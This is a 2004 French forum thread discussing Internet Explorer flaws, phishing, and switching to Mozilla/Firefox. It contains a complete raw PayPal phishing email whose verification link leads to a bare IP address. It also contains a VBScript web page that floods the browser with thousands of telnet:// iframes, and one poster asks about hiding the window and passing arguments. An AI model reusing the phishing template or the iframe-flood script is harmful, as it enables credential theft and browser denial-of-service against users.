Page 1 sur 1

Internet Explorer : une troisième faille

Publié : 16 juin 2004, 12:11
par golum
Futura Sciences -
Contrairement à ce que certains ont pensé, la dernière mise à jour de Windows Update ne corrige pas les 2 failles dont nous avons précédemment parlé (voir notre précédent article). Toutefois un certain nombre d'antivirus semblent capables de ...

http://www.futura-sciences.com/sinformer/n/news3855.php

Publié : 16 juin 2004, 12:56
par jv2759
Je sais plus ou j'avais lut cela mais microsoft à prévut de les corriger mi juillet les faille. En fait il dissait le second mercredi de juillet, histoir d'adoucir un peux.

Sinon pour les anti-virus, moi j'ai le meilleur pour ce genre de virus... firefox;)

Publié : 19 juin 2004, 01:37
par Mori
Ce type d’attaques, qui consiste à se faire passer pour un site bien connu et récupérer frauduleusement des informations que les utilisateurs donneront en toute confiance s’appelle le phishing. Certains site bien connus, comme E-bay ou Paypal risquent d’être pris pour cible (ils l’ont été dans le passé avec des techniques moins sophistiquées, mais basées sur le fait d’imiter un message authentique du site).
Il n’y a pas de parade actuelle à ce problème, sauf votre vigilance ou l’utilisation d’un navigateur basé sur un autre moteur que celui d’Internet Explorer.
le message est, on ne peut plus clair...
il faudrait peut-être suggérer à MS de numéroter ses failles comme les évolutions de logiciels : faille 1.6.3 :twisted:
en leur soumettant l'éventualité de l'inutilité des points. :lol:

le phishing ? :shock: le fishing ! oui :P ... avec moz, en tout cas, on ne va pas à la pêche.

Publié : 29 juin 2004, 00:57
par mildred593
Ca me fait penser à un spam que j'ai recu un jour:

Code : Tout sélectionner

From - Wed Feb 25 23:35:24 2004
X-UIDL: 1077748050.2800.mx1-1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <service@paypal.com>
Delivered-To: online.fr-silkensedai@online.fr
Received: (qmail 2763 invoked from network); 25 Feb 2004 22:27:29 -0000
Received: from 68-174-151-44.nyc.rr.com (68.174.151.44)
  by mx1-1.free.fr with SMTP; 25 Feb 2004 22:27:29 -0000
Received: from 192.244.59.120 by 68.174.151.44;Wed, 25 Feb 2004 17:23:25 -0500
Message-ID: <KKORSGAIKSZORBVBQFUCUVB@msn.com>
From: "service@paypal.com" <service@paypal.com>
Reply-To: "service@paypal.com" <service@paypal.com>
To: sholari@online.fr, shubcorp@online.fr, silkensedai@online.fr, siteordo@online.fr, sitepp@online.fr, smconcept@online.fr, spara@online.fr
Subject: Information Update
Date: Thu, 26 Feb 2004 03:21:25 +0500
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--19805085275850732833"
X-Priority: 3
X-MSMail-Priority: Normal

----19805085275850732833
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>

<link rel=3D"stylesheet" type=3D"text/css" href=3D"http://www.paypal.com/c=
ss/pp_styles_ns6_111402.css">

<body bgcolor=3D"#ffffff">
<img src=3D"http://www.paypal.com/images/paypal_logo.gif">
<table cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>

<tbody>
<tr>
<td width=3D"100%" background=3D"http://www.paypal.com/images/bg_clk.gif">=
<img height=3D29 src=3D"http://www.paypal.com/images/pixel.gif" width=3D1 =
border=3D0></td></tr>
<tr>

<td><img height=3D10 src=3D"http://www.paypal.com/images/pixel.gif" width=3D=
1   border=3D0></td></tr></tbody></table>

<br>
<font class=3D"pptext">
Dear PayPal member,<br>
At PayPal, we value the trust you have placed in us by using our service t=
o conduct your transactions<br>online. Because our relationship with you i=
s financial in nature, the protection of your privacy is particularly<br>i=
mportant to us.
<br><br>

We are sending this verification notice to provide you with information ab=
out how PayPal safeguards<br>
your privacy, as well as to comply with U.S. federal privacy guidelines th=
at apply to financial institutions<br>
such as PayPal. The full terms of PayPal's privacy policy are available on=
 the PayPal website, which you<br>are welcome to review at any time.
<br><br>

<b>Please verify your account and financial information by clicking on the=
 link below:</b><br>
<a href=3D"http://216.12.215.202/paypal/verify/">https://www.paypal.com/cg=
i-bin/webscr?cmd=3Dverify</a>
<br><br>
<b>*** DO NOT REPLY TO THIS EMAIL ***</b>


</font>
<br><br><br>
<center>
Copyright=A9 2003 PayPal, Inc. All rights reserved. Designated trademarks =
and brands are the property<br>of their respective owners.
</center>

</body>

</html>



----19805085275850732833--

Dans ces cas la, il vaut mieux avertir payPal ou l'organisme concerné

Publié : 01 juil. 2004, 01:48
par Mori
il vaut mieux ne pas utiliser un reply, dans aucune adresse d'un mail soupçonné de junk.
va sur le site de ripe, apnic, etc... (selon la zone web) pour le whois de paypal.com ou de l'autre boîte : tu auras l'adresse de l'abuse... tu envoies ta requête avec le junked mail.

Publié : 01 juil. 2004, 11:22
par olab
J'ajouterais, pour rester dans le sujet du fil, que les "experts" s'y mettent aussi :

Source : http://www.clubic.com/n/n13168.html
...Cette affaire a été la goutte d'eau qui a fait déborder le vase pour certains experts. A tel point que certains organismes dédiés à la sécurité comme l'US-CERT (US Computer Emergency Readiness Team) donne un conseil sans équivoque : "Use a different web browser" (utilisez un autre navigateur)....

Publié : 01 juil. 2004, 12:21
par ClémentD
olab a écrit :J'ajouterais, pour rester dans le sujet du fil, que les "experts" s'y mettent aussi :
Je rajouterais :
http://www.pcinpact.com/actu/news/La_US ... plorer.htm
http://www.materiel.be/news/5825/#0

Et je suis agréablement surpris de voir dans les commentaires de moins en moins de messages anti Mozilla :)

Publié : 01 juil. 2004, 17:48
par XF007
Ptite demo :
(a essayer que si vous êtes maso, ca ouvre 8 000 fenetres telnet vers mirososft.com)
http://dejean.benoit.free.fr/img/bass_fishin.gif
:?

Publié : 01 juil. 2004, 18:05
par jv2759
XF007 a écrit :Ptite demo :
(a essayer que si vous êtes maso, ca ouvre 8 000 fenetres telnet vers mirososft.com)
http://dejean.benoit.free.fr/img/bass_fishin.gif
:?
j'ai essayer cela, marant;) En tout cas je préfére la version firefox;)

Le seul truc que je me demande c'est si on peux en plus cacher la fenetre et passer des argument...

Publié : 01 juil. 2004, 18:09
par XF007
le code c'est ca :

Code : Tout sélectionner

<html>
<body>
<H1> netric 0wnz y00! </H1>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>

<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next

</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>

</body>

</html>

Donc je ne pense pas qu'on puisse lancer n'importe quel prog ...
Seulement ceux qui sont associés a un protocole